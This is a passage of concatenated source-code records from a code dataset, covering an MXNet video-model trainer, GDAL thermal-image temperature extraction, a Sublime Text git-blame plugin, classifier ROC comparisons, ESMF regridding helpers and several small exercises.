path('exports/edit//save/', views.exports_update),\n path('exports//param/add/', views.exports_param_add),\n path('exports/param//delete/', views.exports_param_del),\n path('collections//export/', views.export_collection),\n\n path('tasks/', views.tasks, name='tasks')\n]\n","sub_path":"manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"202646746","text":"import logging\nimport argparse\nimport os\nimport sys\nimport mxnet as mx\nimport numpy as np\nfrom utils import load_from_caffe2_pkl\nfrom symbols.r3d_multiclass_relation import create_r3d\nfrom data_loader_ava_relation import ClipBatchIter\nimport pandas as pd\nfrom metric import RCNNAccMetric\nfrom config import config, update_config\n\n\ndef train(config):\n gpus = [int(i) for i in config.gpus.split(',')]\n num_gpus = len(gpus)\n\n logging.info(\"number of gpu %d\" % num_gpus)\n\n if len(gpus) == 0:\n kv = None\n else:\n kv = mx.kvstore.create('local')\n logging.info(\"Running on GPUs: {}\".format(gpus))\n\n # Modify to make it consistent with the distributed trainer\n total_batch_size = config.batch_per_device * num_gpus\n config.total_batch_size = total_batch_size\n\n # Create symbol, arg and aux\n if config.begin_epoch>0:\n sym, arg_params, aux_params = mx.model.load_checkpoint(os.path.join(config.output, 'test'), config.begin_epoch)\n else:\n # Create Network\n sym = create_r3d(\n num_class=config.num_class,\n no_bias=True,\n model_depth=config.model_depth,\n final_spatial_kernel=config.final_spatial_kernel,\n final_temporal_kernel=int(config.n_frame / 8),\n bn_mom=config.bn_mom,\n cudnn_tune=config.cudnn_tune,\n workspace=config.workspace,\n spatial_scale=config.spatial_scale,\n pooled_size=config.pooled_size,\n n_frame=config.n_frame,\n n_bbox=config.n_bbox,\n batch_per_device=config.batch_per_device,\n geometric_dim=config.geometric_dim,\n nongt_dim=config.nongt_dim,\n )\n # Load pretrained params\n arg_params, aux_params = {}, {}\n if config.pretrained:\n arg_params, aux_params = load_from_caffe2_pkl(config.pretrained, sym)\n logging.info(\"load pretrained okay, num of arg_p %d, num of aux_p %d\" % (len(arg_params), len(aux_params)))\n\n # Create Module\n # We can set fixed params here if needed\n m = mx.module.Module(sym, context=[mx.gpu(i) for i in gpus], data_names=['data', 'rois', 'mask'],\n label_names=['softmax_label'])\n\n if config.plot:\n v = mx.viz.plot_network(sym, title='R2Plus1D-train',\n shape={'data': (total_batch_size, 3, config.n_frame, config.scale_h, config.scale_w),\n 'rois': (total_batch_size, config.n_frame // config.temporal_scale, config.n_bbox, 5),\n 'mask': (total_batch_size, config.n_bbox),\n 'softmax_label': (total_batch_size, config.n_bbox, config.num_class)})\n v.render(filename=os.path.join(config.output, 'vis'), cleanup=True)\n\n train_data = mx.io.PrefetchingIter(ClipBatchIter(config=config, train=True))\n test_data = mx.io.PrefetchingIter(ClipBatchIter(config=config, train=False))\n\n # Set optimizer\n optimizer = config.optimizer\n optimizer_params = {}\n optimizer_params['learning_rate'] = config.lr\n optimizer_params['momentum'] = config.momentum\n optimizer_params['wd'] = config.wd\n\n print(config.lr)\n print(config.lr_step)\n\n if config.lr_step:\n optimizer_params['lr_scheduler'] = mx.lr_scheduler.FactorScheduler(step=config.lr_step,\n factor=config.lr_factor)\n # metric = RCNNAccMetric()\n\n\n def acc(label, pred):\n label = label.reshape((-1, config.num_class))\n # print('in acc, pred.size', pred.size, 'pred.shape', pred.shape, 'label.shape', label.shape, 'numerator', (label == np.round(pred)).sum(), 'res', float((label == np.round(pred)).sum()) / pred.size)\n return (label == np.round(pred)).astype(np.float32).mean()\n\n def all_correct_acc(label, pred):\n label = label.reshape((-1, config.num_class))\n # print('in acc, pred.size', pred.size, 'pred.shape', pred.shape, 'label.shape', label.shape, 'numerator', (label == np.round(pred)).sum(), 'res', float((label == np.round(pred)).sum()) / pred.size)\n equal = (label == np.round(pred)).astype(np.int32)\n equal_sum = equal.sum(axis=-1)\n return (equal_sum == label.shape[-1]).astype(np.float32).mean()\n\n\n def loss(label, pred):\n label = label.reshape((-1, config.num_class))\n loss_all = 0\n for i in range(len(pred)):\n loss = 0\n loss -= label[i] * np.log(pred[i] + 1e-6) + (1.- label[i]) * np.log(1. + 1e-6 - pred[i])\n loss_all += np.sum(loss)\n loss_all = float(loss_all)/float(len(pred) + 0.000001)\n return loss_all\n\n eval_metric = list()\n eval_metric.append(mx.metric.np(acc))\n eval_metric.append(mx.metric.np(all_correct_acc))\n eval_metric.append(mx.metric.np(loss))\n\n m.fit(\n train_data=train_data,\n eval_data=test_data,\n eval_metric=eval_metric,\n epoch_end_callback=mx.callback.do_checkpoint(config.output + '/test', 1),\n batch_end_callback=mx.callback.Speedometer(total_batch_size, 20),\n kvstore=kv,\n optimizer=optimizer,\n optimizer_params=optimizer_params,\n initializer=mx.init.Xavier(factor_type=\"in\", magnitude=2.34),\n arg_params=arg_params,\n aux_params=aux_params,\n allow_missing=True,\n begin_epoch=config.begin_epoch,\n num_epoch=config.num_epoch,\n )\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Train R2Plus1D Network')\n # general\n parser.add_argument('--cfg', help='experiment configure file name', required=True, type=str)\n args = parser.parse_args()\n # update config\n config = update_config(args.cfg)\n\n # Create Output Dir\n if not os.path.exists(config.output):\n os.makedirs(config.output)\n\n # Set Logger\n logging.basicConfig(level=logging.DEBUG,\n filename=os.path.join(config.output, 'log.txt'),\n filemode='w')\n # Define a new Handler to log to console as well\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n logging.getLogger('').addHandler(console)\n\n # Start training\n logging.info(\" \".join(sys.argv))\n logging.info(config)\n\n train(config)","sub_path":"train_ava_relation.py","file_name":"train_ava_relation.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"266099961","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Emmanuel Gonzalez, Michele Cosi\nDate : 2020-07-02\nPurpose: Mean temp extraction\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nfrom osgeo import gdal\nimport cv2\nimport matplotlib.pyplot as plt\n#import matplotlib\nimport pandas as pd\nimport glob\nimport numpy as np\nfrom scipy import stats\nfrom scipy.signal import find_peaks\nimport random\nimport statistics\nimport json\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Rock the Casbah',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('dir',\n metavar='str',\n help='A positional argument')\n\n parser.add_argument('-od',\n '--outdir',\n help='Output directory',\n metavar='str',\n type=str,\n default='peak_mean_temp_out')\n\n parser.add_argument('-on',\n '--outname',\n help='Output filename',\n metavar='str',\n type=str,\n default='peak_mean_temp')\n\n parser.add_argument('-g',\n '--geo',\n help='GeoJSON of plots',\n type=str,\n required=True)\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef get_trt_zones():\n trt_zone_1 = []\n trt_zone_2 = []\n trt_zone_3 = []\n\n for i in range(3, 19):\n for i2 in range(2, 48):\n plot = f'MAC_Field_Scanner_Season_10_Range_{i}_Column_{i2}'\n #print(plot)\n trt_zone_1.append(str(plot))\n\n for i in range(20, 36):\n for i2 in range(2, 48):\n plot = f'MAC_Field_Scanner_Season_10_Range_{i}_Column_{i2}'\n #print(plot)\n trt_zone_2.append(str(plot))\n\n for i in range(37, 53):\n for i2 in range(2, 48):\n plot = f'MAC_Field_Scanner_Season_10_Range_{i}_Column_{i2}'\n #print(plot)\n trt_zone_3.append(str(plot))\n\n return trt_zone_1, trt_zone_2, trt_zone_3\n\n\n# --------------------------------------------------\ndef find_trt_zone(plot_name):\n trt_zone_1, trt_zone_2, trt_zone_3 = get_trt_zones()\n #print(trt_zone_1)\n\n if plot_name in trt_zone_1:\n trt = 'treatment 1'\n\n elif plot_name in trt_zone_2:\n trt = 'treatment 2'\n\n elif plot_name in trt_zone_3:\n trt = 'treatment 3'\n\n else:\n trt = 'border'\n\n return trt\n\n\n# --------------------------------------------------\ndef get_genotype(plot, geo):\n with open(geo) as f:\n data = json.load(f)\n\n for feat in data['features']:\n if feat.get('properties')['ID']==plot:\n genotype = feat.get('properties').get('genotype')\n\n return genotype\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n temp_dict = {}\n temp_cnt = 0\n img_list = glob.glob(f'{args.dir}/*/*.tif')\n print(img_list)\n\n if not os.path.isdir(args.outdir):\n os.makedirs(args.outdir)\n\n for one_img in img_list:\n temp_cnt += 1\n date = one_img.split('/')[-3][-10:]\n plot_raw = one_img.split('/')[-2]\n genotype = get_genotype(plot_raw, args.geo)\n plot_name = '_'.join(plot_raw.split(' '))\n trt_zone = find_trt_zone(plot_name)\n #print(f'{plot_name}')\n #print(f'{trt_zone}\\n')\n print(f'Processing {plot_raw}')\n\n img_out_path = os.path.join(args.outdir, plot_name)\n\n if not os.path.isdir(img_out_path):\n os.makedirs(img_out_path)\n\n g_img = gdal.Open(one_img)\n a_img = g_img.GetRasterBand(1).ReadAsArray()\n m = stats.mode(a_img)\n mode, count = m\n peak = mode[0][0:5].mean()\n temp = peak - 273.15\n\n a_img[a_img > peak] = np.nan\n mean_tc = np.nanmean(a_img) - 273.15\n\n driver = gdal.GetDriverByName('BMP')\n\n fig = plt.figure()\n plt.imshow(a_img)\n plt.savefig(img_out_path + f'/{plot_name}.png', transparent=True)\n\n temp_dict[temp_cnt] = {\n 'date': date,\n 'treatment': trt_zone,\n 'plot': plot_name,\n 'genotype': genotype,\n 'plot_temp': temp,\n 'mean_plant_temp': mean_tc\n }\n\n df = pd.DataFrame.from_dict(temp_dict, orient='index', columns=['date',\n 'treatment',\n 'plot',\n 'genotype',\n 'plot_temp',\n 'mean_plant_temp'])\n\n df.to_csv(os.path.join(args.outdir, args.outname + '.csv'), index=False)\n\n print(f'Done. Check outputs in {args.outdir}.')\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"peaks_temp/peaks_temp_up0729.py","file_name":"peaks_temp_up0729.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"220256774","text":"#P4\n\"\"\"\nA palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n\"\"\"\nmax = 0\nfor i in range(100,1000):\n for j in range(100,1000):\n palindrome = i*j\n num = str(palindrome)[::-1] #把这个数当字符串反转后相等就是回文\n if (num == str(palindrome)):\n print(\"回文数\",palindrome)\n if palindrome>max:\n max = palindrome;\nprint(\"最大是\",max)\n","sub_path":"P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"108384895","text":"# -*- coding: utf-8 -*-\n\nimport optparse\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('-H', '--host',\n default='localhost',\n dest='host',\n help='The host to connect to. Default to localhost.',\n type=str)\n parser.add_option('-p', '--port',\n default=5432,\n dest='port',\n help='The port to connect to. Default to 5432.',\n type=int)\n options, args = parser.parse_args()\n print(options, options.host, type(options.host))\n print(options, options.port, type(options.port))\n print(args)\n print('The host is %s, and the port is %d.' % (options.host, options.port))\n","sub_path":"CLITools/opt_with_values.py","file_name":"opt_with_values.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594888082","text":"import os\nimport subprocess\nfrom urllib.parse import parse_qs, quote_plus, urlparse\n\nimport sublime\nimport sublime_plugin\n\nfrom .settings import PKG_SETTINGS_KEY_CUSTOMBLAMEFLAGS, pkg_settings\nfrom .templates import blame_phantom_css, blame_phantom_html_template\nfrom .util import communicate_error, platform_startupinfo, view_is_suitable\n\n# @todo Make a command to open the latest diff (\"CommitDescription\") for the current line in a single keystroke.\n# @body Currently it takes a keystroke and then a mouse click on \"Show\"\n\n\nclass Blame(sublime_plugin.TextCommand):\n\n # Overrides --------------------------------------------------\n\n def __init__(self, view):\n super().__init__(view)\n self.phantom_set = sublime.PhantomSet(view, \"git-blame\")\n\n def run(self, edit, prevving=False, fixed_row_num=None, sha_skip_list=[]):\n if not view_is_suitable(self.view):\n return\n\n phantoms = []\n\n if prevving:\n # We'll be getting blame information for the line whose existing phantom's\n # [Prev] button was clicked, regardless of where the text cursor(s)\n # currently are.\n relevant_regions = [sublime.Region(self.view.text_point(fixed_row_num, 0))]\n else:\n # We'll be getting blame information for the lines where text cursor(s)\n # currently are.\n relevant_regions = self.view.sel()\n\n for region in relevant_regions:\n line_region = self.view.line(region)\n\n # When this Command is ran for a line with a phantom already visible, we\n # erase the phantom (i.e. toggle it). But if the reason this Command is\n # being ran is because the user is clicking the [Prev] button, just erasing\n # the existing phantom is not sufficient, because we need to then display\n # another phantom with updated content.\n if self.phantom_exists_for_region(line_region) and not prevving:\n continue\n\n row_num, _ = self.view.rowcol(region.begin())\n line_num = row_num + 1\n\n full_path = self.view.file_name()\n\n try:\n blame_output = self.get_blame(line_num, full_path, sha_skip_list)\n except Exception as e:\n communicate_error(e)\n return\n\n sha, user, date, time = self.parse_blame(blame_output)\n # The SHA output by `git blame` may have a leading caret to indicate that it\n # is a \"boundary commit\". That needs to be stripped before passing the SHA\n # back to git CLI commands for other purposes.\n sha_normalised = sha.strip(\"^\")\n\n if sha_skip_list:\n recently_skipped_sha = sha_skip_list[-1]\n if sha_normalised == recently_skipped_sha:\n sublime.message_dialog(\n \"No earlier commits affected line {0}\".format(line_num)\n )\n return\n\n phantoms.append(\n sublime.Phantom(\n line_region,\n blame_phantom_html_template.format(\n css=blame_phantom_css,\n sha=sha,\n sha_not_latest_indicator=\" *\" if sha_skip_list else \"\",\n user=user,\n date=date,\n time=time,\n qs_row_num_val=quote_plus(str(row_num)),\n qs_sha_val=quote_plus(sha_normalised),\n # Querystrings can contain the same key multiple times. We use that\n # functionality to accumulate a list of SHAs to skip over when\n # a [Prev] button has been clicked multiple times.\n qs_skip_keyvals=\"&\".join(\n [\n \"skip={0}\".format(quote_plus(skipee))\n for skipee in sha_skip_list\n ]\n ),\n ),\n sublime.LAYOUT_BLOCK,\n self.handle_phantom_button,\n )\n )\n\n self.phantom_set.update(phantoms)\n\n # ------------------------------------------------------------\n\n def get_blame(self, line, path, sha_skip_list):\n cmd_line = [\"git\", \"blame\", \"--minimal\", \"-w\", \"-L {0},{0}\".format(line)]\n for skipped_sha in sha_skip_list:\n cmd_line.extend([\"--ignore-rev\", skipped_sha])\n cmd_line.extend(pkg_settings().get(PKG_SETTINGS_KEY_CUSTOMBLAMEFLAGS, []))\n cmd_line.extend([\"--\", os.path.basename(path)])\n # print(cmd_line)\n return subprocess.check_output(\n cmd_line,\n cwd=os.path.dirname(os.path.realpath(path)),\n startupinfo=platform_startupinfo(),\n stderr=subprocess.STDOUT,\n ).decode(\"utf-8\")\n\n def parse_blame(self, blame):\n sha, file_path, user, date, time, tz_offset, *_ = blame.split()\n\n # Was part of the inital commit so no updates\n if file_path[0] == \"(\":\n user, date, time, tz_offset = file_path, user, date, time\n file_path = None\n\n # Fix an issue where the username has a space\n # Im going to need to do something better though if people\n # start to have multiple spaces in their names.\n if not date[0].isdigit():\n user = \"{0} {1}\".format(user, date)\n date, time = time, tz_offset\n\n return (sha, user[1:], date, time)\n\n def get_commit(self, sha, path):\n return subprocess.check_output(\n [\"git\", \"show\", \"--no-color\", sha],\n cwd=os.path.dirname(os.path.realpath(path)),\n startupinfo=platform_startupinfo(),\n stderr=subprocess.STDOUT,\n ).decode(\"utf-8\")\n\n def phantom_exists_for_region(self, region):\n return any(p.region == region for p in self.phantom_set.phantoms)\n\n def handle_phantom_button(self, href):\n url = urlparse(href)\n querystring = parse_qs(url.query)\n # print(url)\n # print(querystring)\n\n if url.path == \"copy\":\n sublime.set_clipboard(querystring[\"sha\"][0])\n sublime.status_message(\"Git SHA copied to clipboard\")\n elif url.path == \"show\":\n sha = querystring[\"sha\"][0]\n try:\n desc = self.get_commit(sha, self.view.file_name())\n except Exception as e:\n communicate_error(e)\n return\n\n buf = self.view.window().new_file()\n buf.run_command(\n \"blame_insert_commit_description\",\n {\"desc\": desc, \"scratch_view_name\": \"commit \" + sha},\n )\n elif url.path == \"prev\":\n sha = querystring[\"sha\"][0]\n row_num = querystring[\"row_num\"][0]\n sha_skip_list = querystring.get(\"skip\", [])\n if sha not in sha_skip_list:\n sha_skip_list.append(sha)\n self.run(\n None,\n prevving=True,\n fixed_row_num=int(row_num),\n sha_skip_list=sha_skip_list,\n )\n elif url.path == \"close\":\n # Erase all phantoms\n self.phantom_set.update([])\n else:\n communicate_error(\n \"No handler for URL path '{0}' in phantom\".format(url.path)\n )\n\n\nclass BlameInsertCommitDescription(sublime_plugin.TextCommand):\n\n # Overrides --------------------------------------------------\n\n def run(self, edit, desc, scratch_view_name):\n view = self.view\n view.set_scratch(True)\n view.assign_syntax(\"Packages/Diff/Diff.sublime-syntax\")\n view.insert(edit, 0, desc)\n view.set_name(scratch_view_name)\n view.set_read_only(True)\n","sub_path":"src/blame.py","file_name":"blame.py","file_ext":"py","file_size_in_byte":7894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473244759","text":"#### Librerias a utilizar #####\nimport numpy as np \nimport pandas as pd\nfrom sklearn import datasets,linear_model\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split #separa data\nimport sklearn\nfrom sklearn.utils import resample\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import roc_curve, roc_auc_score\n\n#KNN\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.neighbors import KNeighborsClassifier\n\n#logistic regresion\nfrom sklearn.linear_model import LogisticRegression\n\n#Naive Bayes\nfrom sklearn.naive_bayes import GaussianNB\n\n#MatrixConfusion\n\nfrom sklearn.metrics import confusion_matrix\n\n\n\n\n\n# Import libraries for graphs\nfrom mpl_toolkits import mplot3d\n\nfilename=\"genero.txt\"\n\ndef main():\n \n #Lectura de Datos\n data_default = pd.read_csv(filename,sep=\",\",header=0)\n\n # Entendimiento de la data\n print('Informacion del data set')\n \"\"\" print(data_default.shape)\n print(data_default.head(78))\n print(data_default.columns) \"\"\"\n\n #Convertir yes y no a 1 o 0\n data_default.loc[data_default['Gender'] == 'Male' , 'Gender'] = 1\n data_default.loc[data_default['Gender'] == 'Female' , 'Gender'] = 0\n\n #Imprimir data set despues de conversion\n X_male = data_default['Gender'] == 1\n X_female = data_default['Gender'] == 0\n #### PREPARAR DATA PARA KNN ###\n\n #Define inputs X columns studen, balance and income\n X = data_default.iloc[:,1:3]\n\n #Defino output\n y = data_default.iloc[:,0]\n\n indices = range(X.shape[0])\n #Partimos los data sets\n X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2)\n \n y_train=y_train.astype('int')\n y_test=y_test.astype('int')\n\n clf = LogisticRegression()\n clf.fit(X_train, y_train)\n\n y_score1 = clf.predict_proba(X_test)[:,1]\n\n false_positive_rate1, true_positive_rate1, threshold1 = roc_curve(y_test, y_score1)\n print('roc_auc_score for logistic regresion: ', roc_auc_score(y_test, y_score1))\n\n\n knn = KNeighborsClassifier(algorithm='brute',n_neighbors=75)\n knn.fit(X_train,y_train) \n\n y_score2 = knn.predict_proba(X_test)[:,1]\n\n false_positive_rate2, true_positive_rate2, threshold2 = roc_curve(y_test, y_score2)\n print('roc_auc_score for KNN: ', roc_auc_score(y_test, y_score2))\n\n\n NB = GaussianNB()\n NB.fit(X_train, y_train)\n y_score3 = NB.predict_proba(X_test)[:,1]\n\n false_positive_rate3, true_positive_rate3, threshold3 = roc_curve(y_test, y_score3)\n print('roc_auc_score for Naive Bayes: ', roc_auc_score(y_test, y_score3))\n\n\n plt.subplots(1, figsize=(10,10))\n plt.title('ROC for data genero')\n \n plt.plot(false_positive_rate1, true_positive_rate1,color=\"blue\")\n plt.plot(false_positive_rate2, true_positive_rate2, color=\"red\")\n plt.plot(false_positive_rate3, true_positive_rate3, color=\"green\")\n\n plt.plot([0, 1], ls=\"solid\")\n plt.plot([0, 0], [1, 0] , c=\".7\"), plt.plot([1, 1] , c=\".7\")\n \n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n\n plt.legend([\"Logistic regresion\", \"KNN\",\" Naive Bayes\"])\n plt.show()\n\nmain()","sub_path":"ROC_genero.py","file_name":"ROC_genero.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"278554841","text":"import paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n client.subscribe(\"sensortoy/led\")\n\ndef on_message(client, userdata, msg):\n if msg.payload == \"on\":\n print(\"Led On\\r\\n\")\n else :\n print(\"Led Off\\r\\n\")\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"localhost\", 1883, 60)\n\nclient.loop_forever()\n\n","sub_path":"Client/MockSensorToy.py","file_name":"MockSensorToy.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594703202","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sys\n\n__author__ = \"Onceabu\"\n__version__ = \"v2.0\"\n\n\"\"\"\n Time \n describe \n copyright (c) 2019 by Abu\n\"\"\"\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\nclass Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n # 这道题的难点好像并不是算法 熟悉递增数列是关键点更合适点\n # 只要子序列是递增的那么依次增加之和即该子序列的最大值减最小值\n return sum([\n prices[i + 1] - prices[i] for i in range(len(prices) - 1) if prices[i + 1] > prices[i]\n ])\n","sub_path":"Week_03/G20200343030573/LeetCode_122_573.py","file_name":"LeetCode_122_573.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556740386","text":"from korm import korm\nfrom AxoftUser import AxoftUser\n\nimport Data.KormOrderStatusesPositive as Positive\nimport Data.KormOrderStatusesNegative as Negative\nimport Data.KormOrderStatusesNotValid as NotValid\n\nuser = AxoftUser()\nuser.AuthFrontend()\nuser.AuthBackend()\noKorm = korm(user)\n\nimport time\ndef test_korm(ReplacementDictionary):\n\tfor test_case in ReplacementDictionary:\t\t\n\t\toKorm.addProduct(user)\t\t\n\t\toKorm.createOrder(user)\n\t\tOrderId = user.getLastOrderId()\t\t\n\t\ttest_case['Number'] = str(OrderId)\n\t\tAxNum = 'Ax000' + str(OrderId)\n\t\ttest_case['1cID'] = AxNum\n\t\ttest_case['AxID'] = AxNum\n\n\t\toKorm.setOrderStatus('Data/TemplateOrder.xml', test_case)\t\t\n\t\toKorm.prepareOrder()\n\t\toKorm.sendKorm('Data/TemplateApproveKORM.xml', dict( [('Number', test_case['Number']), ('1cID', test_case['1cID'])] ) )\n\t\t\n\t\toKorm.WriteLog(test_case)\t\t\n\ntest_korm(Positive.ReplacementDictionary)\ntest_korm(Negative.ReplacementDictionary)\ntest_korm(NotValid.ReplacementDictionary)","sub_path":"Axoft/kormtest.py","file_name":"kormtest.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"294199420","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 11:50:58 2020\n\n@author: tes520\n\"\"\"\nimport ESMF\n\nimport numpy as np \nimport subprocess\n\nfrom osgeo import gdal\nfrom tqdm import tqdm\n\nimport sys\n# sys.path.append('/media/tes520/LaCie1/Mapping/modules')\n# from __FL import Read_NCDF\n# from __CLASS import GetGeoTransform, UpdateGT\nfrom __GEO import GetGeoTransform, UpdateGT\n\n\ndef regrid_to_sat_tile(raster_path, varname, tileshape_path,\n sat_lats, sat_lons):\n \n #crop to tile shapefile\n crop_cmd = 'gdalwarp -cutline '+tileshape_path+' -crop_to_cutline '+\\\n raster_path+' '+\\\n tileshape_path.replace('tile.shp', varname+'_tile.tif')\n subprocess.call(crop_cmd, shell=True)\n cropped_path = tileshape_path.replace('tile.shp', varname+'_tile.tif')\n\n \n #read in raster and get geotransform data\n raster = gdal.Open(cropped_path)\n raster_gt = GetGeoTransform(cropped_path)\n raster_arr = raster.ReadAsArray()\n \n lons_in = np.arange(raster_gt['ulx'], raster_gt['lrx'], raster_gt['xres'])\n lats_in = np.arange(raster_gt['uly'], raster_gt['lry'], raster_gt['yres'])\n \n #lat/lon info to feed into regridder\n x_dist = raster_gt['xres']/2\n y_dist = raster_gt['yres']/2\n \n if len(raster_arr.shape) > 2:\n n = len(raster_arr)\n raster_regridded = np.zeros((n, sat_lats.shape[0], sat_lons.shape[0]))\n else:\n n = 1\n raster_regridded = np.zeros((n, sat_lats.shape[0], sat_lons.shape[0]))\n raster_arr = raster_arr.reshape(1, raster_arr.shape[0], raster_arr.shape[1])\n \n #regrid by selecting a large MODIS pixel, and finding the overlapping pixel\n for i in tqdm(range(len(lons_in))):\n x = lons_in[i]\n \n xinds = np.where(np.logical_and(x - x_dist <= sat_lons, sat_lons <= x + x_dist))[0]\n #exclude areas outside the raster\n if len(xinds) == 0:\n continue\n \n for j in range(len(lats_in)):\n y = lats_in[j]\n \n yinds = np.where(np.logical_and(y + y_dist <= sat_lats, sat_lats <= y - y_dist))[0]\n if len(yinds) == 0:\n continue\n for k in range(n):\n raster_regridded[k,yinds[0]:yinds[-1]+1,xinds[0]:xinds[-1]+1] = raster_arr[k,j,i]\n #write to file\n UpdateGT(tileshape_path.replace('tile.shp',varname+'_regridded.tif'), raster_regridded, \n tileshape_path.replace('tile.shp', 'tile.tif'))\n \n return raster_regridded\n \n\ndef regrid(dataset,src_lon,src_lat,dst_lon,dst_lat,FORTRAN_CONTIGUOUS = True):\n \n ESMF.Manager(debug=True)\n\n\n #use fortran engine when reshaping\n if FORTRAN_CONTIGUOUS:\n dst_shape = dst_lat.T.shape\n src_shape = src_lat.T.shape\n else:\n dst_shape = dst_lat.shape\n src_shape = src_lat.shape\n \n \n #source met grid\n sourcegrid = ESMF.Grid(np.array(src_shape), staggerloc=ESMF.StaggerLoc.CENTER, coord_sys=ESMF.CoordSys.SPH_DEG)\n #destination grid based on LDS date data\n destgrid = ESMF.Grid(np.array(dst_shape), staggerloc=ESMF.StaggerLoc.CENTER, coord_sys=ESMF.CoordSys.SPH_DEG)\n \n source_lon = sourcegrid.get_coords(0)\n source_lat = sourcegrid.get_coords(1)\n \n dest_lon = destgrid.get_coords(0)\n dest_lat = destgrid.get_coords(1)\n \n #add data to pointers\n if FORTRAN_CONTIGUOUS:\n source_lon[...] = src_lon.T\n source_lat[...] = src_lat.T\n \n dest_lon[...] = dst_lon.T\n dest_lat[...] = dst_lon.T\n else:\n source_lon[...] = src_lon\n source_lat[...] = src_lat\n \n dest_lon[...] = dst_lon\n dest_lat[...] = dst_lat\n \n sourcefield = ESMF.Field(sourcegrid, name='ECMWF 0.1x0.1')\n \n destfield = ESMF.Field(destgrid, name='LDS 50kmx50km')\n \n if FORTRAN_CONTIGUOUS:\n sourcefield.data[...] = dataset.T\n else:\n sourcefield.data[...] = dataset\n \n regrid = ESMF.Regrid(sourcefield, destfield, regrid_method=ESMF.RegridMethod.BILINEAR, \n unmapped_action=ESMF.UnmappedAction.IGNORE)\n \n destfield = regrid(sourcefield, destfield)\n \n return destfield.data.T\n\n\n\ndef write_to_raster(outfile, data, lats, lons, epsg = 4326):\n \n xmin,ymin,xmax,ymax = [lon.min(),lat.min(),lon.max(),lat.max()]\n \n if np.shape(data) > 2:\n n,nrows,ncols = np.shape(data)\n else:\n nrows,ncols = np.shape(data)\n data.reshape(1, data.shape[0], data.shape[1])\n n = 1\n \n xres = (xmax-xmin)/float(ncols)\n yres = (ymax-ymin)/float(nrows)\n geotransform=(xmin,xres,0,ymax,0, -yres) \n # That's (top left x, w-e pixel resolution, rotation (0 if North is up), \n # top left y, rotation (0 if North is up), n-s pixel resolution)\n \n output_raster = gdal.GetDriverByName('GTiff').Create(outfile ,ncols, nrows, n, gdal.GDT_Float32) # Open the file\n output_raster.SetGeoTransform(geotransform) # Specify its coordinates\n srs = osr.SpatialReference() # Establish its coordinate encoding\n srs.ImportFromEPSG(epsg) # This one specifies WGS84 lat long.\n # Anyone know how to specify the \n # IAU2000:49900 Mars encoding?\n output_raster.SetProjection( srs.ExportToWkt() ) # Exports the coordinate system \n \n for i in range(n): # to the file\n output_raster.GetRasterBand(i+1).WriteArray(data[i]) # Writes my array to the raster\n \n output_raster.FlushCache()","sub_path":"__SATMODEL.py","file_name":"__SATMODEL.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172539516","text":"from django.shortcuts import render, redirect\nfrom .models import Queries, Equipment, Employees, Comment, Maintenance, Worktime, Eq_stoptime, Unstated_works\nfrom datetime import datetime, timedelta, timezone\nfrom django.db import connection\nuser_timezone_sql = '+03:00'\n\n\ndef change_time(request, query_id):\n query = Queries.objects.get(query_id=query_id)\n start_time = request.POST.get('start_datetime')\n stop_time = request.POST.get('stop_datetime')\n query.start_time = start_time\n query.stop_time = stop_time\n if query.appoint_time == None:\n query.appoint_time = query.post_time\n query.save()\n return 